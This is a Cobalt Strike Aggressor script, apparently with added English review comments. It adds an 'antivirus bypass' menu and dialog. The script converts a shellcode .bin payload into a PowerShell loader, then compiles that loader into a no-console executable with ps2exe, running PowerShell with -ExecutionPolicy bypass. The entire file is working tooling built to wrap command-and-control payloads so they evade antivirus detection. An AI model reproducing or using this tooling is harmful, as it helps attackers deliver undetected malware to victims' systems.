powershell_bypass.cna
# Aggressor (Sleep) script: registers a "powershell免杀" menu whose single
# item opens the dialog built by dialog_powershell() below.
menubar("powershell免杀","powershell");
popup powershell {
item("&生成exe",{dialog_powershell()});
}
# Hard-coded working directory on the host running this script (the Cobalt
# Strike client, presumably). Every file the script reads or writes lives
# under it: powershell_load.ps1 and ps2exe.ps1 are expected here, and
# generated files go under $output_file.
$path = "F:\\cstemp\\";
$output_file = $path."output";
# String accumulators for payload_bin_to_ps1(); declared global so the
# pieces built inside its loops survive, and reset at the end of each call.
global('$char_code');
global('$new_strs');
# Reads the file at $bin_path, renders its bytes as a comma-separated list
# of decimal values, substitutes that list into the "acode=" line of the
# powershell_load.ps1 template, and writes the result to $payload_file_ps1.
# NOTE(review): the two arguments show() passes are never read — the sub
# relies on the globals $bin_path and $payload_file_ps1 that show() assigns
# before calling it.
sub payload_bin_to_ps1 {
$in = openf($bin_path);
# -1: read to end of file.
$data = readb($in, -1);
for ($x = 0; $x < strlen($data); $x++)
{
$shellcode = (byteAt($data, $x) . ",");
$char_code = $char_code.$shellcode;
}
# Drop the trailing comma left by the loop.
$char_code = left($char_code, int(strlen($char_code)) - 1);
$org_file = $path.'powershell_load.ps1';
$handle = openf($org_file);
# Template lines matching /acode.*=.*/ are replaced by the byte list; every
# other line is copied through with a newline re-appended.
while $text (readln($handle)){
$rep = replace($text, 'acode.*=.*', 'acode='.$char_code)."\n";
$new_strs = $new_strs.$rep;
}
# right(..., len-1) discards the first character of the assembled text,
# so the first character of the template never reaches the output file.
$filestring = right($new_strs, int(strlen($new_strs)) - 1);
$out = openf(">$payload_file_ps1");
writeb($out, $filestring);
closef($out);
closef($in);
# $handle (the template) is never closed.
$new_strs = '';
$char_code = '';
}
# Dialog callback. $3 holds the dialog field values keyed by the names
# drawn in dialog_powershell() (bin, payload, version, output_exe).
sub show {
# These are read as globals by payload_bin_to_ps1(), not via its arguments.
$bin_path = $3["bin"];
# Output paths are built from free-text dialog fields and later spliced
# unquoted into the exec() command lines below; no validation is done.
$payload_file_ps1 = $output_file.'\\'.$3["payload"];
$output_exe = $output_file.'\\'.$3["output_exe"];
# ps2exe.ps1 is always taken from $path; the dialog's "ps2exe" default is
# never consulted.
$ps2exe = $path.'\.\\ps2exe.ps1';
mkdir($output_file);
if (-exists $bin_path) {
payload_bin_to_ps1($bin_path,$payload_file_ps1);
# "powershell 4.0" -> "4.0" -> "4"; any other selection takes the else branch.
$version = right($3["version"], 3);
$int_version = left($version, 1);
println($payload_file_ps1);
# exec() runs a local process on the host executing this script, not on a
# beacon. The 4.0 branch launches powershell.exe with -ExecutionPolicy
# bypass; the 2.0 branch echoes the same command line through cmd.exe and
# pipes it to powershell's stdin. Both leave a powershell.exe child of the
# Cobalt Strike client process with these arguments on the command line.
if ($int_version == "4") {
$process = exec('powershell.exe -ExecutionPolicy bypass -command "'.$ps2exe.' -inputFile '.$payload_file_ps1.' -outputFile '.$output_exe.' -noConsole -runtime40" ');
} else {
$process = exec('cmd.exe /c echo '.$ps2exe.' -inputFile '.$payload_file_ps1.' -outputFile '.$output_exe.' -noConsole -runtime20 | powershell -');
}
# Process output is only echoed to the script console; its exit status is
# not checked, so a failed ps2exe run still reports success below.
@data = readAll($process);
println(@data);
closef($process);
show_message("\n加载bin文件:".$bin_path."\n输出payload文件:".$payload_file_ps1."\n版本是:".$3["version"]."\n输出exe地址:".$output_exe);
} else {
show_message('请指定bin文件');
}
}
# Builds and shows the input dialog; its action button invokes show() with
# the field values in $3.
sub dialog_powershell {
$info = dialog("powershell bypass av",%(ps2exe => "ps2exe.ps1",bin => "payload.bin",payload => "payload_cs.ps1",version => "4.0",output_exe => "bypass.exe"),&show); # First argument is the dialog title, second is the default value for each field drawn below, third is the callback: show() runs when the button is pressed and receives the entered values.
# The "ps2exe" field is not drawn, so its default above is never editable
# and show() does not read it.
# drow_text($info,"ps2exe","ps2exe.ps1");
drow_file($info,"bin","Choose: default payload.bin");
drow_text($info, "payload", "生成ps1");
# Only the first character of the last three characters of this value is
# examined by show() ("4" selects the -runtime40 branch).
drow_combobox($info, "version", "Version: ", @("powershell 4.0", "powershell 2.0"));
drow_text($info,"output_exe","输出地址:");
dbutton_action($info,"点击生成!"); # dbutton_action adds the action button to the dialog; pressing it fires the callback.
dialog_show($info); # Display the dialog.
}